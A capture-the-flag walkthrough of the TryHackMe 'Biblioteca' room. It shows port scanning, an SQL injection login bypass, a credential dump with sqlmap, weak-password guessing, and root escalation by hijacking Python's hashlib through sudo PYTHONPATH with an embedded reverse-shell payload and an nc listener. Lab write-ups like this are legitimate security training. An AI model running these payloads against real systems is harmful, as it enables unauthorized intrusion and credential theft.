TryHackMe: Biblioteca

Walk-Through

Intro

Hey folks! This time, let’s root Biblioteca room which is rated as Medium (difficulty) in TryHackMe. Let’s root!

Initials

export IP=<your_IP>

Enumerations

let’s start with port scanning:

rustscan -a $IP --ulimit 5000 | tee rustscan.txt

With rustscan we got to know that there are two open ports i.e. 22 (ssh) and 8000 (http).

let’s get deep into these ports.

nmap -sC -sV -p22,8000 -Pn -oN nmap $IP

nmap scan results

I checked port 8000 since I don’t have any ssh credentials :)

port 8000:

Upon visiting the http site, there was a login page

login page

I created an account and logged in

there was nothing, which was fishy.

I ran gobuster scan, but didn't got any other page.

Then I tried for SQLi, and guess what? It worked

I tried simple payload in password field i.e. 'or 1=1 -- — and we got logged in some other users account named smokey!

smokey account logged in

Exploit:

I quickly fired up Burp Suite → captured the request → Saved the request

burp image

sqlmap

sqlmap -r sql.req --dbs --dump

and got the username, email & password

sqlmap results

SSH with the credentials and get the user flag

But wait, we didn’t have permission to read user.txt file, because the owner is another user named hazel

after spending some time on post compromise recon, I didn’t find nothing.

Later I checked the TryHackMe’s official discord channel for some discussion room and got to know that the other user hazel's password was VERY weak.

At first, I ran hydra with 100 common passwords from Seclists → Failed

then in frustration I entered the password as username and it worked. i.e. the password is username (hazel:hazel)

Now I got the user.txt

PrivEsc:

If you have the password of the user, first thing to run is sudo -l :D

Saw that SETENV, which means we can set the environment variables while running the mentioned command as root!

Viewing the hasher.py file

After some research/googling I came across 2 blogs/articles which was very helpful (links are at the end).

There is some kinda python lib hijacking. In short, to hijack, follow the steps:

1. get the location of python library (which is being used), in our case its /usr/lib/python3.8/
2. copy the hashlib.py file to /tmp

cp /usr/lib/python3.8/hashlib.py /tmp/hashlib.py

3. add the reverse shell in the hashlib.py file (where ever you want)

reverse shell used:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

4. Start the listener

nc -lnvp 1234

5. to get the shell, run the command

sudo PYTHONPATH=/tmp/ /usr/bin/python3 /home/hazel/hasher.py

The PYTHONPATH environment variable indicates a directory (or directories), where Python can search for modules to import.

and there go I got the shell. Stabilize the shell and get the root.txt file

root

So with this, we have completed this room.

Thanks for reading this blog. See you in the blog, till then Happy Hacking o7

|| Room | Twitter | Blog1 | Blog2 ||